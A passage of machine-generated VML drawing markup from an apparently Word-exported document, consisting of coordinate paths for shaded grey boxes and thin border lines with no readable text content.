13141,1440,13140,1440,13139,1440,13138,1440,13137,1440,13136,1440,13134,1440,13133,1440,13132,1440,13130,1440,13129,1440,13127,1440,13125,1440,13124,1440,13122,1440,13120,1440,13118,1440,13116,1440,13113,1440,13111,1440,13109,1440,13106,1440,13103,1440,13101,1440,13098,1440,13095,1440,13092,1440,13089,1440,13085,1440,13082,1440,13078,1440,13075,1440,13071,1440,13067,1440,13063,1440,13059,1440,13055,1440,13050,1440,13046,1440,13041,1440,13036,1440,13031,1440,13026,1440,13021,1440,13016,1440,13010,1440,13005,1440,12999,1440,12993,1440,12987,1440,12980,1440,12974,1440,12967,1440,12961,1440,12954,1440,12947,1440,12939,1440,12932,1440,12924,1440,12917,1440,12909,1440,12901,1440,12892,1440,12884,1440,12875,1440,12866,1440,12857,1440,12848,1440,12838,1440,12829,1440,12819,1440,12809,1440,12799,1440,12788,1440,12778,1440,12767,1440,12756,1440,12745,1440,12733,1440,12721,1440,12709,1440,12697,1440,12685,1440,12672,1440,12660,1440,12647,1440,12633,1440,12620,1440,12606,1440,12592e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:628.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,12570" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:12570;width:30;height:570" coordorigin="1430,12570" coordsize="30,570" path="m1447,12592l1447,12592,1447,12592,1447,12592,1447,12592,1447,12592,1447,12592,1447,12592,1447,12592,1447,12592,1447,12593,1447,12593,1447,12593,1447,12593,1447,12593,1447,12593,1447,12593,1447,12594,1447,12594,1447,12594,1447,12595,1447,12595,1447,12595,1447,12596,1447,12596,1447,12597,1447,12597,1447,12598,1447,12599,1447,12600,1447,12600,1447,12601,1447,12602,1447,12603,1447,12604,1447,12605,1447,12606,1447,12608,1447,12609,1447,12610,1447,12612,1447,12613,1447,12615,1447,12617,1447,12619,1447,12620,1447,12622,1447,12624,1447,12627,1447,12629,1447,12631,1447,12634,1447,12636,1447,12639,1447,12642,1447,12644,1447,12647,1447,12650,1447,12654,1447,12657,1447,12660,1447,12664,1447,12667,1447,12671,1447,12675,1447,12679,1447,12683,1447,12687,1447,12692,1447,12696,1447,12701,1447,12706,1447,12711,1447,12716,1447,12721,1447,12726,1447,12732,1447,12738,1447,12743,1447,12749,1447,12755,1447,12762,1447,12768,1447,12775,1447,12781,1447,12788,1447,12795,1447,12803,1447,12810,1447,12818,1447,12826,1447,12834,1447,12842,1447,12850,1447,12858,1447,12867,1447,12876,1447,12885,1447,12894,1447,12904,1447,12913,1447,12923,1447,12933,1447,12943,1447,12954,1447,12964,1447,12975,1447,12986,1447,12998,1447,13009,1447,13021,1447,13033,1447,13045,1447,13057,1447,13070,1447,13083,1447,13096,1447,13109,1447,13122,1447,13136,1447,13150e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:656.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,13130" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:13130;width:9110;height:550" coordorigin="1430,13130" coordsize="9110,550" path="m1440,13150l1440,13150,1440,13150,1440,13150,1441,13150,1441,13150,1441,13150,1442,13150,1442,13150,1443,13150,1444,13150,1446,13150,1448,13150,1450,13150,1452,13150,1455,13150,1459,13150,1463,13150,1467,13150,1472,13150,1477,13150,1484,13150,1490,13150,1498,13150,1506,13150,1515,13150,1525,13150,1535,13150,1547,13150,1559,13150,1572,13150,1586,13150,1601,13150,1617,13150,1635,13150,1653,13150,1672,13150,1692,13150,1714,13150,1737,13150,1761,13150,1786,13150,1813,13150,1841,13150,1870,13150,1901,13150,1933,13150,1966,13150,2001,13150,2038,13150,2076,13150,2116,13150,2157,13150,2200,13150,2245,13150,2291,13150,2339,13150,2389,13150,2441,13150,2494,13150,2550,13150,2607,13150,2667,13150,2728,13150,2791,13150,2856,13150,2924,13150,2993,13150,3065,13150,3139,13150,3215,13150,3293,13150,3374,13150,3457,13150,3542,13150,3629,13150,3719,13150,3812,13150,3907,13150,4004,13150,4104,13150,4206,13150,4311,13150,4419,13150,4529,13150,4642,13150,4758,13150,4876,13150,4998,13150,5122,13150,5249,13150,5378,13150,5511,13150,5647,13150,5785,13150,5927,13150,6072,13150,6220,13150,6371,13150,6525,13150,6682,13150,6842,13150,7006,13150,7173,13150,7343,13150,7517,13150,7694,13150,7874,13150,8058,13150,8245,13150,8436,13150,8630,13150,8828,13150,9030,13150,9235,13150,9444,13150,9656,13150,9872,13150,10092,13150,10316,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13150,10543,13151,10543,13151,10543,13151,10543,13151,10543,13151,10543,13152,10543,13152,10543,13152,10543,13153,10543,13153,10543,13154,10543,13154,10543,13155,10543,13156,10543,13156,10543,13157,10543,13158,10543,13159,10543,13160,10543,13160,10543,13161,10543,13163,10543,13164,10543,13165,10543,13166,10543,13168,10543,13169,10543,13171,10543,13172,10543,13174,10543,13176,10543,13177,10543,13179,10543,13181,10543,13183,10543,13186,10543,13188,10543,13190,10543,13193,10543,13195,10543,13198,10543,13201,10543,13204,10543,13207,10543,13210,10543,13213,10543,13216,10543,13220,10543,13223,10543,13227,10543,13231,10543,13235,10543,13239,10543,13243,10543,13247,10543,13252,10543,13256,10543,13261,10543,13266,10543,13271,10543,13276,10543,13281,10543,13286,10543,13292,10543,13297,10543,13303,10543,13309,10543,13315,10543,13322,10543,13328,10543,13335,10543,13341,10543,13348,10543,13355,10543,13363,10543,13370,10543,13378,10543,13385,10543,13393,10543,13402,10543,13410,10543,13418,10543,13427,10543,13436,10543,13445,10543,13454,10543,13463,10543,13473,10543,13483,10543,13493,10543,13503,10543,13513,10543,13524,10543,13535,10543,13546,10543,13557,10543,13568,10543,13580,10543,13592,10543,13604,10543,13616,10543,13629,10543,13641,10543,13654,10543,13668,10543,13681,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10542,13695,10542,13695,10541,13695,10540,13695,10538,13695,10536,13695,10534,13695,10532,13695,10529,13695,10525,13695,10521,13695,10517,13695,10512,13695,10506,13695,10500,13695,10493,13695,10486,13695,10478,13695,10469,13695,10459,13695,10449,13695,10437,13695,10425,13695,10412,13695,10398,13695,10383,13695,10366,13695,10349,13695,10331,13695,10312,13695,10291,13695,10270,13695,10247,13695,10223,13695,10198,13695,10171,13695,10143,13695,10114,13695,10083,13695,10051,13695,10018,13695,9983,13695,9946,13695,9908,13695,9868,13695,9827,13695,9784,13695,9739,13695,9693,13695,9645,13695,9595,13695,9543,13695,9489,13695,9434,13695,9377,13695,9317,13695,9256,13695,9193,13695,9127,13695,9060,13695,8990,13695,8919,13695,8845,13695,8769,13695,8691,13695,8610,13695,8527,13695,8442,13695,8354,13695,8265,13695,8172,13695,8077,13695,7980,13695,7880,13695,7778,13695,7673,13695,7565,13695,7455,13695,7342,13695,7226,13695,7108,13695,6986,13695,6862,13695,6735,13695,6605,13695,6473,13695,6337,13695,6198,13695,6057,13695,5912,13695,5764,13695,5613,13695,5459,13695,5302,13695,5142,13695,4978,13695,4811,13695,4641,13695,4467,13695,4290,13695,4110,13695,3926,13695,3739,13695,3548,13695,3354,13695,3156,13695,2954,13695,2749,13695,2540,13695,2328,13695,2112,13695,1892,13695,1668,13695,1440,13695,1440,13695,1440,13695,1440,13695,1440,13695,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13694,1440,13693,1440,13693,1440,13693,1440,13693,1440,13692,1440,13692,1440,13692,1440,13691,1440,13691,1440,13690,1440,13689,1440,13689,1440,13688,1440,13687,1440,13687,1440,13686,1440,13685,1440,13684,1440,13683,1440,13682,1440,13681,1440,13679,1440,13678,1440,13677,1440,13675,1440,13674,1440,13672,1440,13671,1440,13669,1440,13667,1440,13665,1440,13663,1440,13661,1440,13659,1440,13656,1440,13654,1440,13652,1440,13649,1440,13646,1440,13644,1440,13641,1440,13638,1440,13635,1440,13631,1440,13628,1440,13625,1440,13621,1440,13617,1440,13614,1440,13610,1440,13606,1440,13602,1440,13597,1440,13593,1440,13588,1440,13584,1440,13579,1440,13574,1440,13569,1440,13564,1440,13558,1440,13553,1440,13547,1440,13541,1440,13535,1440,13529,1440,13523,1440,13516,1440,13510,1440,13503,1440,13496,1440,13489,1440,13482,1440,13474,1440,13467,1440,13459,1440,13451,1440,13443,1440,13435,1440,13426,1440,13417,1440,13409,1440,13400,1440,13390,1440,13381,1440,13371,1440,13362,1440,13352,1440,13341,1440,13331,1440,13320,1440,13310,1440,13299,1440,13287,1440,13276,1440,13264,1440,13253,1440,13240,1440,13228,1440,13216,1440,13203,1440,13190,1440,13177,1440,13163,1440,13150e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:656.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,13130" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:13130;width:30;height:570" coordorigin="1430,13130" coordsize="30,570" path="m1447,13150l1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13150,1447,13151,1447,13151,1447,13151,1447,13151,1447,13151,1447,13152,1447,13152,1447,13152,1447,13153,1447,13153,1447,13154,1447,13154,1447,13155,1447,13156,1447,13156,1447,13157,1447,13158,1447,13159,1447,13160,1447,13160,1447,13161,1447,13163,1447,13164,1447,13165,1447,13166,1447,13168,1447,13169,1447,13171,1447,13172,1447,13174,1447,13176,1447,13177,1447,13179,1447,13181,1447,13183,1447,13186,1447,13188,1447,13190,1447,13193,1447,13195,1447,13198,1447,13201,1447,13204,1447,13207,1447,13210,1447,13213,1447,13216,1447,13220,1447,13223,1447,13227,1447,13231,1447,13235,1447,13239,1447,13243,1447,13247,1447,13252,1447,13256,1447,13261,1447,13266,1447,13271,1447,13276,1447,13281,1447,13286,1447,13292,1447,13297,1447,13303,1447,13309,1447,13315,1447,13322,1447,13328,1447,13335,1447,13341,1447,13348,1447,13355,1447,13363,1447,13370,1447,13378,1447,13385,1447,13393,1447,13402,1447,13410,1447,13418,1447,13427,1447,13436,1447,13445,1447,13454,1447,13463,1447,13473,1447,13483,1447,13493,1447,13503,1447,13513,1447,13524,1447,13535,1447,13546,1447,13557,1447,13568,1447,13580,1447,13592,1447,13604,1447,13616,1447,13629,1447,13641,1447,13654,1447,13668,1447,13681,1447,13695e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:683.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,13670" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:13670;width:9110;height:570" coordorigin="1430,13670" coordsize="9110,570" path="m1440,13695l1440,13695,1440,13695,1440,13695,1441,13695,1441,13695,1441,13695,1442,13695,1442,13695,1443,13695,1444,13695,1446,13695,1448,13695,1450,13695,1452,13695,1455,13695,1459,13695,1463,13695,1467,13695,1472,13695,1477,13695,1484,13695,1490,13695,1498,13695,1506,13695,1515,13695,1525,13695,1535,13695,1547,13695,1559,13695,1572,13695,1586,13695,1601,13695,1617,13695,1635,13695,1653,13695,1672,13695,1692,13695,1714,13695,1737,13695,1761,13695,1786,13695,1813,13695,1841,13695,1870,13695,1901,13695,1933,13695,1966,13695,2001,13695,2038,13695,2076,13695,2116,13695,2157,13695,2200,13695,2245,13695,2291,13695,2339,13695,2389,13695,2441,13695,2494,13695,2550,13695,2607,13695,2667,13695,2728,13695,2791,13695,2856,13695,2924,13695,2993,13695,3065,13695,3139,13695,3215,13695,3293,13695,3374,13695,3457,13695,3542,13695,3629,13695,3719,13695,3812,13695,3907,13695,4004,13695,4104,13695,4206,13695,4311,13695,4419,13695,4529,13695,4642,13695,4758,13695,4876,13695,4998,13695,5122,13695,5249,13695,5378,13695,5511,13695,5647,13695,5785,13695,5927,13695,6072,13695,6220,13695,6371,13695,6525,13695,6682,13695,6842,13695,7006,13695,7173,13695,7343,13695,7517,13695,7694,13695,7874,13695,8058,13695,8245,13695,8436,13695,8630,13695,8828,13695,9030,13695,9235,13695,9444,13695,9656,13695,9872,13695,10092,13695,10316,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13695,10543,13696,10543,13696,10543,13696,10543,13696,10543,13697,10543,13697,10543,13698,10543,13698,10543,13699,10543,13699,10543,13700,10543,13700,10543,13701,10543,13702,10543,13703,10543,13703,10543,13704,10543,13705,10543,13706,10543,13708,10543,13709,10543,13710,10543,13711,10543,13713,10543,13714,10543,13716,10543,13717,10543,13719,10543,13721,10543,13723,10543,13725,10543,13727,10543,13729,10543,13731,10543,13733,10543,13736,10543,13738,10543,13741,10543,13744,10543,13747,10543,13750,10543,13753,10543,13756,10543,13759,10543,13762,10543,13766,10543,13770,10543,13773,10543,13777,10543,13781,10543,13785,10543,13790,10543,13794,10543,13799,10543,13803,10543,13808,10543,13813,10543,13818,10543,13823,10543,13829,10543,13834,10543,13840,10543,13846,10543,13852,10543,13858,10543,13864,10543,13870,10543,13877,10543,13884,10543,13891,10543,13898,10543,13905,10543,13912,10543,13920,10543,13928,10543,13936,10543,13944,10543,13952,10543,13961,10543,13969,10543,13978,10543,13987,10543,13996,10543,14006,10543,14016,10543,14025,10543,14035,10543,14046,10543,14056,10543,14067,10543,14078,10543,14089,10543,14100,10543,14111,10543,14123,10543,14135,10543,14147,10543,14159,10543,14172,10543,14185,10543,14198,10543,14211,10543,14224,10543,14238,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10542,14252,10542,14252,10541,14252,10540,14252,10538,14252,10536,14252,10534,14252,10532,14252,10529,14252,10525,14252,10521,14252,10517,14252,10512,14252,10506,14252,10500,14252,10493,14252,10486,14252,10478,14252,10469,14252,10459,14252,10449,14252,10437,14252,10425,14252,10412,14252,10398,14252,10383,14252,10366,14252,10349,14252,10331,14252,10312,14252,10291,14252,10270,14252,10247,14252,10223,14252,10198,14252,10171,14252,10143,14252,10114,14252,10083,14252,10051,14252,10018,14252,9983,14252,9946,14252,9908,14252,9868,14252,9827,14252,9784,14252,9739,14252,9693,14252,9645,14252,9595,14252,9543,14252,9489,14252,9434,14252,9377,14252,9317,14252,9256,14252,9193,14252,9127,14252,9060,14252,8990,14252,8919,14252,8845,14252,8769,14252,8691,14252,8610,14252,8527,14252,8442,14252,8354,14252,8265,14252,8172,14252,8077,14252,7980,14252,7880,14252,7778,14252,7673,14252,7565,14252,7455,14252,7342,14252,7226,14252,7108,14252,6986,14252,6862,14252,6735,14252,6605,14252,6473,14252,6337,14252,6198,14252,6057,14252,5912,14252,5764,14252,5613,14252,5459,14252,5302,14252,5142,14252,4978,14252,4811,14252,4641,14252,4467,14252,4290,14252,4110,14252,3926,14252,3739,14252,3548,14252,3354,14252,3156,14252,2954,14252,2749,14252,2540,14252,2328,14252,2112,14252,1892,14252,1668,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14252,1440,14251,1440,14251,1440,14251,1440,14251,1440,14250,1440,14250,1440,14250,1440,14249,1440,14249,1440,14249,1440,14248,1440,14248,1440,14247,1440,14246,1440,14246,1440,14245,1440,14244,1440,14243,1440,14242,1440,14241,1440,14240,1440,14239,1440,14238,1440,14237,1440,14235,1440,14234,1440,14232,1440,14231,1440,14229,1440,14228,1440,14226,1440,14224,1440,14222,1440,14220,1440,14218,1440,14216,1440,14213,1440,14211,1440,14208,1440,14206,1440,14203,1440,14200,1440,14197,1440,14194,1440,14191,1440,14188,1440,14184,1440,14181,1440,14177,1440,14173,1440,14169,1440,14165,1440,14161,1440,14157,1440,14153,1440,14148,1440,14143,1440,14139,1440,14134,1440,14129,1440,14123,1440,14118,1440,14113,1440,14107,1440,14101,1440,14095,1440,14089,1440,14083,1440,14076,1440,14070,1440,14063,1440,14056,1440,14049,1440,14042,1440,14034,1440,14027,1440,14019,1440,14011,1440,14003,1440,13994,1440,13986,1440,13977,1440,13968,1440,13959,1440,13950,1440,13941,1440,13931,1440,13921,1440,13911,1440,13901,1440,13891,1440,13880,1440,13869,1440,13858,1440,13847,1440,13835,1440,13824,1440,13812,1440,13800,1440,13787,1440,13775,1440,13762,1440,13749,1440,13736,1440,13722,1440,13708,1440,13695e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:684.500pt;width:1.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,13690" coordsize="30,550">
        <v:shape style="position:absolute;left:1430;top:13690;width:30;height:550" coordorigin="1430,13690" coordsize="30,550" path="m1447,13695l1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13695,1447,13696,1447,13696,1447,13696,1447,13696,1447,13697,1447,13697,1447,13698,1447,13698,1447,13699,1447,13699,1447,13700,1447,13700,1447,13701,1447,13702,1447,13703,1447,13703,1447,13704,1447,13705,1447,13706,1447,13708,1447,13709,1447,13710,1447,13711,1447,13713,1447,13714,1447,13716,1447,13717,1447,13719,1447,13721,1447,13723,1447,13725,1447,13727,1447,13729,1447,13731,1447,13733,1447,13736,1447,13738,1447,13741,1447,13744,1447,13747,1447,13750,1447,13753,1447,13756,1447,13759,1447,13762,1447,13766,1447,13770,1447,13773,1447,13777,1447,13781,1447,13785,1447,13790,1447,13794,1447,13799,1447,13803,1447,13808,1447,13813,1447,13818,1447,13823,1447,13829,1447,13834,1447,13840,1447,13846,1447,13852,1447,13858,1447,13864,1447,13870,1447,13877,1447,13884,1447,13891,1447,13898,1447,13905,1447,13912,1447,13920,1447,13928,1447,13936,1447,13944,1447,13952,1447,13961,1447,13969,1447,13978,1447,13987,1447,13996,1447,14006,1447,14016,1447,14025,1447,14035,1447,14046,1447,14056,1447,14067,1447,14078,1447,14089,1447,14100,1447,14111,1447,14123,1447,14135,1447,14147,1447,14159,1447,14172,1447,14185,1447,14198,1447,14211,1447,14224,1447,14238,1447,14252e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:711.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,14230" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:14230;width:9110;height:550" coordorigin="1430,14230" coordsize="9110,550" path="m1440,14252l1440,14252,1440,14252,1440,14252,1441,14252,1441,14252,1441,14252,1442,14252,1442,14252,1443,14252,1444,14252,1446,14252,1448,14252,1450,14252,1452,14252,1455,14252,1459,14252,1463,14252,1467,14252,1472,14252,1477,14252,1484,14252,1490,14252,1498,14252,1506,14252,1515,14252,1525,14252,1535,14252,1547,14252,1559,14252,1572,14252,1586,14252,1601,14252,1617,14252,1635,14252,1653,14252,1672,14252,1692,14252,1714,14252,1737,14252,1761,14252,1786,14252,1813,14252,1841,14252,1870,14252,1901,14252,1933,14252,1966,14252,2001,14252,2038,14252,2076,14252,2116,14252,2157,14252,2200,14252,2245,14252,2291,14252,2339,14252,2389,14252,2441,14252,2494,14252,2550,14252,2607,14252,2667,14252,2728,14252,2791,14252,2856,14252,2924,14252,2993,14252,3065,14252,3139,14252,3215,14252,3293,14252,3374,14252,3457,14252,3542,14252,3629,14252,3719,14252,3812,14252,3907,14252,4004,14252,4104,14252,4206,14252,4311,14252,4419,14252,4529,14252,4642,14252,4758,14252,4876,14252,4998,14252,5122,14252,5249,14252,5378,14252,5511,14252,5647,14252,5785,14252,5927,14252,6072,14252,6220,14252,6371,14252,6525,14252,6682,14252,6842,14252,7006,14252,7173,14252,7343,14252,7517,14252,7694,14252,7874,14252,8058,14252,8245,14252,8436,14252,8630,14252,8828,14252,9030,14252,9235,14252,9444,14252,9656,14252,9872,14252,10092,14252,10316,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14252,10543,14253,10543,14253,10543,14253,10543,14253,10543,14253,10543,14253,10543,14254,10543,14254,10543,14254,10543,14255,10543,14255,10543,14256,10543,14256,10543,14257,10543,14257,10543,14258,10543,14258,10543,14259,10543,14260,10543,14261,10543,14262,10543,14263,10543,14264,10543,14265,10543,14266,10543,14267,10543,14268,10543,14270,10543,14271,10543,14273,10543,14274,10543,14276,10543,14278,10543,14280,10543,14282,10543,14284,10543,14286,10543,14288,10543,14290,10543,14293,10543,14295,10543,14298,10543,14300,10543,14303,10543,14306,10543,14309,10543,14312,10543,14315,10543,14318,10543,14322,10543,14325,10543,14329,10543,14333,10543,14337,10543,14341,10543,14345,10543,14349,10543,14354,10543,14358,10543,14363,10543,14368,10543,14373,10543,14378,10543,14383,10543,14388,10543,14394,10543,14400,10543,14405,10543,14411,10543,14418,10543,14424,10543,14430,10543,14437,10543,14444,10543,14451,10543,14458,10543,14465,10543,14472,10543,14480,10543,14488,10543,14496,10543,14504,10543,14512,10543,14521,10543,14529,10543,14538,10543,14547,10543,14556,10543,14566,10543,14575,10543,14585,10543,14595,10543,14605,10543,14616,10543,14626,10543,14637,10543,14648,10543,14659,10543,14671,10543,14682,10543,14694,10543,14706,10543,14718,10543,14731,10543,14744,10543,14757,10543,14770,10543,14783,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10542,14797,10542,14797,10541,14797,10540,14797,10538,14797,10536,14797,10534,14797,10532,14797,10529,14797,10525,14797,10521,14797,10517,14797,10512,14797,10506,14797,10500,14797,10493,14797,10486,14797,10478,14797,10469,14797,10459,14797,10449,14797,10437,14797,10425,14797,10412,14797,10398,14797,10383,14797,10366,14797,10349,14797,10331,14797,10312,14797,10291,14797,10270,14797,10247,14797,10223,14797,10198,14797,10171,14797,10143,14797,10114,14797,10083,14797,10051,14797,10018,14797,9983,14797,9946,14797,9908,14797,9868,14797,9827,14797,9784,14797,9739,14797,9693,14797,9645,14797,9595,14797,9543,14797,9489,14797,9434,14797,9377,14797,9317,14797,9256,14797,9193,14797,9127,14797,9060,14797,8990,14797,8919,14797,8845,14797,8769,14797,8691,14797,8610,14797,8527,14797,8442,14797,8354,14797,8265,14797,8172,14797,8077,14797,7980,14797,7880,14797,7778,14797,7673,14797,7565,14797,7455,14797,7342,14797,7226,14797,7108,14797,6986,14797,6862,14797,6735,14797,6605,14797,6473,14797,6337,14797,6198,14797,6057,14797,5912,14797,5764,14797,5613,14797,5459,14797,5302,14797,5142,14797,4978,14797,4811,14797,4641,14797,4467,14797,4290,14797,4110,14797,3926,14797,3739,14797,3548,14797,3354,14797,3156,14797,2954,14797,2749,14797,2540,14797,2328,14797,2112,14797,1892,14797,1668,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14797,1440,14796,1440,14796,1440,14796,1440,14796,1440,14796,1440,14796,1440,14796,1440,14795,1440,14795,1440,14795,1440,14795,1440,14794,1440,14794,1440,14793,1440,14793,1440,14792,1440,14792,1440,14791,1440,14790,1440,14790,1440,14789,1440,14788,1440,14787,1440,14786,1440,14785,1440,14784,1440,14783,1440,14782,1440,14780,1440,14779,1440,14778,1440,14776,1440,14774,1440,14773,1440,14771,1440,14769,1440,14767,1440,14765,1440,14763,1440,14761,1440,14759,1440,14756,1440,14754,1440,14751,1440,14749,1440,14746,1440,14743,1440,14740,1440,14737,1440,14734,1440,14730,1440,14727,1440,14723,1440,14720,1440,14716,1440,14712,1440,14708,1440,14704,1440,14700,1440,14695,1440,14691,1440,14686,1440,14681,1440,14676,1440,14671,1440,14666,1440,14660,1440,14655,1440,14649,1440,14643,1440,14637,1440,14631,1440,14625,1440,14619,1440,14612,1440,14605,1440,14598,1440,14591,1440,14584,1440,14576,1440,14569,1440,14561,1440,14553,1440,14545,1440,14537,1440,14528,1440,14520,1440,14511,1440,14502,1440,14493,1440,14483,1440,14474,1440,14464,1440,14454,1440,14444,1440,14433,1440,14423,1440,14412,1440,14401,1440,14390,1440,14378,1440,14367,1440,14355,1440,14343,1440,14330,1440,14318,1440,14305,1440,14292,1440,14279,1440,14266,1440,14252e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:711.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,14230" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:14230;width:30;height:570" coordorigin="1430,14230" coordsize="30,570" path="m1447,14252l1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14252,1447,14253,1447,14253,1447,14253,1447,14253,1447,14253,1447,14253,1447,14254,1447,14254,1447,14254,1447,14255,1447,14255,1447,14256,1447,14256,1447,14257,1447,14257,1447,14258,1447,14258,1447,14259,1447,14260,1447,14261,1447,14262,1447,14263,1447,14264,1447,14265,1447,14266,1447,14267,1447,14268,1447,14270,1447,14271,1447,14273,1447,14274,1447,14276,1447,14278,1447,14280,1447,14282,1447,14284,1447,14286,1447,14288,1447,14290,1447,14293,1447,14295,1447,14298,1447,14300,1447,14303,1447,14306,1447,14309,1447,14312,1447,14315,1447,14318,1447,14322,1447,14325,1447,14329,1447,14333,1447,14337,1447,14341,1447,14345,1447,14349,1447,14354,1447,14358,1447,14363,1447,14368,1447,14373,1447,14378,1447,14383,1447,14388,1447,14394,1447,14400,1447,14405,1447,14411,1447,14418,1447,14424,1447,14430,1447,14437,1447,14444,1447,14451,1447,14458,1447,14465,1447,14472,1447,14480,1447,14488,1447,14496,1447,14504,1447,14512,1447,14521,1447,14529,1447,14538,1447,14547,1447,14556,1447,14566,1447,14575,1447,14585,1447,14595,1447,14605,1447,14616,1447,14626,1447,14637,1447,14648,1447,14659,1447,14671,1447,14682,1447,14694,1447,14706,1447,14718,1447,14731,1447,14744,1447,14757,1447,14770,1447,14783,1447,14797e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:738.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,14770" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:14770;width:9110;height:570" coordorigin="1430,14770" coordsize="9110,570" path="m1440,14797l1440,14797,1440,14797,1440,14797,1441,14797,1441,14797,1441,14797,1442,14797,1442,14797,1443,14797,1444,14797,1446,14797,1448,14797,1450,14797,1452,14797,1455,14797,1459,14797,1463,14797,1467,14797,1472,14797,1477,14797,1484,14797,1490,14797,1498,14797,1506,14797,1515,14797,1525,14797,1535,14797,1547,14797,1559,14797,1572,14797,1586,14797,1601,14797,1617,14797,1635,14797,1653,14797,1672,14797,1692,14797,1714,14797,1737,14797,1761,14797,1786,14797,1813,14797,1841,14797,1870,14797,1901,14797,1933,14797,1966,14797,2001,14797,2038,14797,2076,14797,2116,14797,2157,14797,2200,14797,2245,14797,2291,14797,2339,14797,2389,14797,2441,14797,2494,14797,2550,14797,2607,14797,2667,14797,2728,14797,2791,14797,2856,14797,2924,14797,2993,14797,3065,14797,3139,14797,3215,14797,3293,14797,3374,14797,3457,14797,3542,14797,3629,14797,3719,14797,3812,14797,3907,14797,4004,14797,4104,14797,4206,14797,4311,14797,4419,14797,4529,14797,4642,14797,4758,14797,4876,14797,4998,14797,5122,14797,5249,14797,5378,14797,5511,14797,5647,14797,5785,14797,5927,14797,6072,14797,6220,14797,6371,14797,6525,14797,6682,14797,6842,14797,7006,14797,7173,14797,7343,14797,7517,14797,7694,14797,7874,14797,8058,14797,8245,14797,8436,14797,8630,14797,8828,14797,9030,14797,9235,14797,9444,14797,9656,14797,9872,14797,10092,14797,10316,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14797,10543,14798,10543,14798,10543,14798,10543,14798,10543,14799,10543,14799,10543,14799,10543,14800,10543,14800,10543,14801,10543,14801,10543,14802,10543,14803,10543,14803,10543,14804,10543,14805,10543,14806,10543,14807,10543,14808,10543,14809,10543,14810,10543,14811,10543,14812,10543,1481